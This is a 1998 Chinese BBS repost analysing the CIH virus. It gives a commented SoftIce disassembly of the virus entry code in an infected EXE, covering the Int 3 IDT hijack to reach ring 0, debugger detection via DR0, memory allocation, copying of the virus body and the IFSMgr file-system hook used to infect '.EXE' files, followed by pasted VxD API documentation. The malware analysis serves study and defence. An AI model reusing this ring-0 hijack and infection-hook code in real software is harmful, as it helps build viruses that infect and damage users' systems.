發(fā)信人: TBsoft (TBsoft), 信區(qū): Virus 

標  題: SoftIce分析的結(jié)果[轉(zhuǎn)載] 

發(fā)信站: 武漢白云黃鶴站 (Mon Oct 26 10:51:47 1998) , 站內(nèi)信件 

  

發(fā)信人: Nova_Zhao@bbs.ustc.edu.cn (真生命), 信區(qū): virus 

標 題: SoftIce分析的結(jié)果 

發(fā)信站: 中國科大BBS站 (Sun Oct 25 10:37:13 1998) 

轉(zhuǎn)信站: wuheebbs!ustcnews!ustcbbs 

  

CIH 的分析 

被感染的EXE :Sthcd.exe 

文件長度 :209KB 

  

  

入口: 

CS:EIP=0137:004002A1 SS:ESP=013F:0069FE38 

EAX=004002A0 EBX=00000000 ECX=8159970C EDX=8159974C 

ESI=815996EC EDI=81599A08 EBP=0069FF78 EFL=00000A86 

DS=013F ES=013F FS=37E7 GS=0000 

  

  

  

0137:004002A0 PUSH EBP 

0137:004002A1 LEA EAX,[ESP-08] SS:0069FE30=BFF742F3 

0137:004002A5 XOR EBX,EBX 

0137:004002A7 XCHG EAX,FS:[EBX] ;FS是誰的段?? 

0137:004002AA CALL 004002AF 

0137:004002AF POP EBX ;EBX等于上一句的返回地址 

0137:004002B0 LEA ECX,[EBX+42] 

0137:004002B3 PUSH ECX 

0137:004002B4 PUSH EAX 

0137:004002B5 PUSH EAX 　 ;這４字節(jié)作為緩沖區(qū) 

0137:004002B6 SIDT FWORD PTR [ESP-02] ;取中斷描述符表寄存器(48字節(jié)）　　　　　　 

  

0137:004002BB POP EBX　　　　　　　　　　　;得到中斷描述符表基址　　 

0137:004002BC ADD EBX,1C　　　　　　 ;每個描述項占８字節(jié)　　　　 

0137:004002BF CLI　　　　　　　　　　　　　　 ;加1C則指向Int 3的描述項 

0137:004002C0 MOV EBP,[EBX]　　　　　　　　　 

0137:004002C2 MOV BP,[EBX-04] ;保存Int 3的處理入口于EBP中 

0137:004002C6 LEA ESI,[ECX+12]　　　　　　 ;取新的Int 3的處理入口于ESI中　 

0137:004002C9 PUSH ESI 

0137:004002CA MOV [EBX-04],SI 

0137:004002CE SHR ESI,10 

0137:004002D1 MOV [EBX+02],SI 

0137:004002D5 POP ESI ;設(shè)置新的Int 3的處理入口，本例中ESI=0x00400303 

0137:004002D6 INT 3 

0137:004002D7 PUSH ESI ;保存ESI 

0137:004002D8 MOV ESI,EAX 

0137:004002DA MOV ECX,[EAX-04] 

0137:004002DD REPZ MOVSB ;傳送一塊病毒體到申請的線性內(nèi)存 

0137:004002DF SUB EAX,08 

0137:004002E2 MOV ESI,[EAX] ;傳送完了么? 

0137:004002E4 OR ESI,ESI 

0137:004002E6 JZ 004002EA ;完則跳轉(zhuǎn) 

0137:004002E8 JMP 004002DA ;否則循環(huán) 

;本例中病毒體分為四塊,大小分為0x160,0xc8 

0xc9,0xfa,合計1003字節(jié) 

  

0137:004002EA POP ESI ;恢復(fù)ESI 

0137:004002EB INT 3 ;安裝文件監(jiān)視的服務(wù),Important!!!! 

;置回Int 3的處理入口 

  

0137:004002EC STI 

0137:004002ED XOR EBX,EBX 

0137:004002EF JMP 004002F8 

0137:004002F1 XOR EBX,EBX 

0137:004002F3 MOV EAX,FS:[EBX] 

0137:004002F6 MOV ESP,[EAX] 

0137:004002F8 POP DWORD PTR FS:[EBX] 

0137:004002FB POP EAX 

0137:004002FC POP EBP 

0137:004002FD PUSH 0040A010 ;恢復(fù)原程序的運行 

0137:00400302 RET 

  

  

;新的Int 3的處理入口 

0137:00400303 JZ 00400337 

0137:00400305 MOV ECX,DR0 ;DR0調(diào)試斷點一,檢測調(diào)試程序 

0137:00400308 JECXZ 0040031A ;無則跳轉(zhuǎn) 

0137:0040030A ADD DWORD PTR [ESP],15 

0137:0040030E MOV [EBX-04],BP ;置回Int 3的處理入口 

0137:00400312 SHR EBP,10 

0137:00400315 MOV [EBX+02],BP 　　　　 

0137:00400319 IRETD 

  

0137:0040031A MOV DR0,EBX ;破壞追蹤 

0137:0040031D PUSH 0F 

0137:0040031F PUSH ECX ;ECX必須為零，F(xiàn)or PG_VM 

0137:00400320 PUSH FF ;VM Handle 

0137:00400322 PUSH ECX ;Physical address is a multiple of 4K. 

0137:00400323 PUSH ECX ; 

0137:00400324 PUSH ECX 

0137:00400325 PUSH 01 

0137:00400327 PUSH 02 ;PAGEUSEALIGN 

0137:00400329 INT 20 VXDCall _PageAllocate ;申請一塊線性內(nèi)存 

0137:0040032F ADD ESP,20 

0137:00400332 XCHG EAX,EDI ;基址置于EDI中 

0137:00400333 LEA EAX,[ESI-63] ;取第一塊病毒體的地址 

0137:00400336 IRETD 

  

  

  

0137:00400337 LEA EAX,[EDI-0309] 

0137:0040033D PUSH EAX 

0137:0040033E INT 20 VXDCall IFSMgr_InstallFileSystemApiHook 

;安裝文件監(jiān)視的服務(wù),Important!!!! 

0137:00400344 MOV DR0,EAX 

0137:00400347 POP EAX 

0137:00400348 MOV ECX,[ESI+3D] 

0137:0040034B MOV EDX,[ECX] 

0137:0040034D MOV [EAX-04],EDX 

0137:00400350 LEA EAX,[EAX-2A] 

0137:00400353 MOV [ECX],EAX 

0137:00400355 CLI 

0137:00400356 JMP 0040030E 

0137:00400358 PUSH EBX 

0137:00400359 CALL 0040035E 

0137:0040035E POP EBX 

0137:0040035F ADD EBX,24 

0137:00400362 PUSH EBX 

0137:00400363 INT 20 VXDCall IFSMgr_RemoveFileSystemApiHook 

0137:00400369 POP EAX 

0137:0040036A PUSH DWORD PTR [ESP+08] 

0137:0040036E CALL [EBX-04] 

0137:00400371 POP ECX 

0137:00400372 PUSH EAX 

0137:00400373 PUSH EBX 

0137:00400374 CALL [EBX-04] 

0137:00400377 POP ECX 

0137:00400378 MOV DR0,EAX 

0137:0040037B POP EAX 

0137:0040037C POP EBX 

0137:0040037D RET 

0137:0040037E CMP AL,0E 

0137:00400381 SHL BYTE PTR [EAX-18],00 

0137:00400385 ADD [EAX],AL 

0137:00400387 ADD [ESI-7F],BL 

0137:0040038A MOV BYTE PTR [EBX],03 

0137:0040038D ADD [EAX],AL 

0137:0040038F TEST BYTE PTR [ESI],01 

0137:00400392 JNZ 00400588 

0137:00400398 LEA EBX,[ESP+28] 

0137:0040039C CMP DWORD PTR [EBX],24 

0137:0040039F JNZ 00400582 

0137:004003A5 INC BYTE PTR [ESI] 

0137:004003A7 ADD ESI,05 

0137:004003AA PUSH ESI 

0137:004003AB MOV AL,[EBX+04] 

0137:004003AE CMP AL,FF 

0137:004003B0 JZ 004003BA 

0137:004003B2 ADD AL,40 

0137:004003B4 MOV AH,3A 

0137:004003B6 MOV [ESI],EAX 

0137:004003B8 INC ESI 

0137:004003B9 INC ESI 

0137:004003BA PUSH 00 

0137:004003BC PUSH 7F 

0137:004003BE MOV EBX,[EBX+10] 

0137:004003C1 MOV EAX,[EBX+0C] 

0137:004003C4 ADD EAX,04 

0137:004003C7 PUSH EAX 

0137:004003C8 PUSH ESI 

0137:004003C9 INT 20 VXDCall UniToBCSPath 

0137:004003CF ADD ESP,10 

0137:004003D2 CMP DWORD PTR [EAX+ESI-04],4558452E 

0137:004003DA POP ESI 

0137:004003DB JNZ 0040057F 

0137:004003E1 CMP WORD PTR [EBX+18],01 

0137:004003E6 JNZ 0040057F 

0137:004003EC MOV AX,4300 

0137:004003F0 INT 20 VXDCall IFSMgr_Ring0_FileIO 

0137:004003F6 JB 0040057F 

0137:004003FC PUSH ECX 

0137:004003FD MOV EDI,[ESI+00000062] 

0137:00400403 ADD [EAX],AL 

0137:00400405 ADD [EAX],AL 

0137:00400407 ADD [EAX],AL 

0137:00400409 ADD [EAX],AL 

0137:0040040B ADD [EAX],AL 

0137:0040040D ADD [EAX],AL 

0137:0040040F ADD [EAX],AL 

0137:00400411 ADD [EAX],AL 

0137:00400413 ADD [EAX],AL 

0137:00400415 ADD [EAX],AL 

0137:00400417 ADD [EAX],AL 

0137:00400419 ADD [EAX],AL 

0137:0040041B ADD [EAX],AL 

0137:0040041D ADD [EAX],AL 

0137:0040041F ADD [EAX],AL 

0137:00400421 ADD [EAX],AL 

0137:00400423 ADD [EAX],AL 

0137:00400425 ADD [EAX],AL 

0137:00400427 ADD [EAX],AL 

0137:00400429 ADD [EAX],AL 

0137:0040042B ADD [EAX],AL 

0137:0040042D ADD [EAX],AL 

0137:0040042F ADD [EAX],AL 

0137:00400431 ADD [EAX],AL 

0137:00400433 ADD [EAX],AL 

0137:00400435 ADD [EAX],AL 

0137:00400437 ADD [EAX],AL 

0137:00400439 ADD [EAX],AL 

0137:0040043B ADD [EAX],AL 

0137:0040043D ADD [EAX],AL 

  

//以上是病毒體的第一部分 

  

  

  

注釋: 

VXD服務(wù) 

1.　_PageAllocate 

C語言原型：ULONG EXTERN _PageAllocate(ULONG nPages, ULONG pType, ULONG VM, 

　　 ULONG AlignMask, ULONG minPhys, ULONG maxPhys, ULONG *PhysAddr, 

　 ULONG flags); 

  

0137:0040031D PUSH 0F 

0137:0040031F PUSH ECX 

0137:00400320 PUSH FF 

0137:00400322 PUSH ECX 

0137:00400323 PUSH ECX 

0137:00400324 PUSH ECX 

0137:00400325 PUSH 01 

0137:00400327 PUSH 02 

  

  

#define PG_VM 0 

#define PG_SYS 1 

#define PG_RESERVED1 2 

#define PG_PRIVATE 3 

#define PG_RESERVED2 4 

#define PG_RELOCK 5 /* PRIVATE to MMGR */ 

#define PG_INSTANCE 6 

#define PG_HOOKED 7 

#define PG_IGNORE 0xFFFFFFFF 

  

#define PAGEZEROINIT 0x00000001 

#define PAGEUSEALIGN 0x00000002 

#define PAGECONTIG 0x00000004 

#define PAGEFIXED 0x00000008 

#define PAGEDEBUGNULFAULT 0x00000010 

#define PAGEZEROREINIT 0x00000020 

#define PAGENOCOPY 0x00000040 

#define PAGELOCKED 0x00000080 

#define PAGELOCKEDIFDP 0x00000100 

#define PAGESETV86PAGEABLE 0x00000200 

#define PAGECLEARV86PAGEABLE 0x00000400 

#define PAGESETV86INTSLOCKED 0x00000800 

#define PAGECLEARV86INTSLOCKED 0x00001000 

#define PAGEMARKPAGEOUT 0x00002000 

#define PAGEPDPSETBASE 0x00004000 

#define PAGEPDPCLEARBASE 0x00008000 

#define PAGEDISCARD 0x00010000 

#define PAGEPDPQUERYDIRTY 0x00020000 

#define PAGEMAPFREEPHYSREG 0x00040000 

#define PAGENOMOVE 0x10000000 

#define PAGEMAPGLOBAL 0x40000000 

#define PAGEMARKDIRTY 0x80000000 

  

  

2.IFSMgr_InstallFileSystemApiHook 

IFSMgr_InstallFileSystemApiHook( 

pIFSFileHookFunc HookFunc 

) 

3.IFSMgr_RemoveFileSystemApiHook 

IFSMgr_RemoveFileSystemApiHook( 

pIFSFileHookFunc HookFunc 

) 

4.UniToBCSPath 

UniToBCSPath( 

unsigned char * pBCSPath, 

ParsedPath * pUniPath, 

unsigned int maxLength, 

int charSet 

) 

This service converts a canonicalized unicode pathname to a normal pathname in t 

he 

specified BCS character set i.e. the path element lengths are converted into pro 

per 

path separators in addition to the character set conversion. Currently, the Wind 

ows 

ANSI codepage or the current OEM codepage in the system can be specified for the 

  

conversion. It is important to note that the source and destination buffers cann 

ot 

be the same nor can they overlap. They should be two separate buffers. This serv 

ice 

does not terminate the converted path with a NUL character, the caller of the se 

rvice 

needs to do this, if necessary. 

  

5.IFSMgr_Ring0_FileIO 

This service provides a register-based VxD callable interface to the common file 

system 

functions. Other VxDs in the system can use this service to make filesystem call 

s without 

having to issue int 21h calls. An FSD itself can call this interface to do files 

ystem 

operations in certain situations. The different functions provided as part of th 

is 

service are described below. Since these calls can be made only by 'trusted' sys 

tem 

components, the IFS manager does not do any parameter validation on them. Users 

of this 

service should be very careful to check that they are passing in valid parameter 

s. 

  

OpenCreateFile 

This interface is the same as the interface for the int 21h extended open functi 

on 

(06Ch ). If the R0_OPENCREATFILE function code is used, the operation is done in 

 an 

independent context, so that handle is globally accessible from any VM. If the 

R0_OPENCREAT_IN_CONTEXT function code is used, the operation is done in the cont 

ext 

of the current thread and process. 

[EAX] 

R0_OPENCREATFILE or RO_OPENCREAT_IN_CONTEXT 

  

[BX] 

  

Open mode and other flags. The flags are exactly the same as those on the int 21 

h 

function 6Ch. Please refer to the specification of the int 21h function for deta 

ils. 

  

[CX] 

  

Attributes to use on a create operation. 

  

[DL] 

  

Action to be performed. Look at the int 21h, function 6ch documentation for deta 

ils. 

  

[DH] 

  

Special flags that are available only on this api. This register is reserved and 

 not used on the int 21h, function 6Ch api. 

  

Special Ring 0 Api Open Flags: 

Value Meaning 

R0_NO_CACHE Indicates that reads and writes on the file should not be cached. 

All operations will be directly done to the disk. 

R0_SWAPPER_CALL Indicates that the i/o operation is being performed to the syste 

m 

swap file. This is a privileged call that should be set only by the 

memory manager when it is doing i/o to page stuff in and out of the disk. 

The filesystem that handles swap file io needs to ensure certain 

conditions to prevent deadlocks. These are described in section 8.3.4 

of this document. 

  

[ESI] 

  

Flat pointer to the pathname of the file to be opened/created. 

  

?Carry flag clear, operation was successful. 

  

[EAX] Handle to opened file. 

[ECX] Actual action performed. For the return values, please refer to the docume 

nt describing the int 21h, function 6Ch api. 

  

Carry flag set, an error occurred. [AX] contains the errorcode. 

Registers Used EAX, ECX, Flags. 

  

ReadFile 

This function is called to read a file previously opened by OpenCreateFile. The 

handle must be one returned from the OpenCreateFile service described above, it 

cannot be a handle opened by issuing an int 21h. If the R0_READFILE_IN_CONTEXT f 

unction code i 

  

  

[EAX] 

  

R0_READFILE or R0_READFILE_IN_CONTEXT. 

  

[EBX] 

  

File handle. 

  

[ECX] 

  

Count of bytes to be read. This can be a full 32-bit transfer count. 

  

[EDX] 

  

Position in file the read operation needs to start at. 

  

[ESI] 

  

Flat pointer to the buffer the data is to read into. 

  

?Carry flag clear, no error. 

  

[ECX] Number of bytes actually read. 

  

Carry flag set, an error occurred. [AX] contains the errorcode.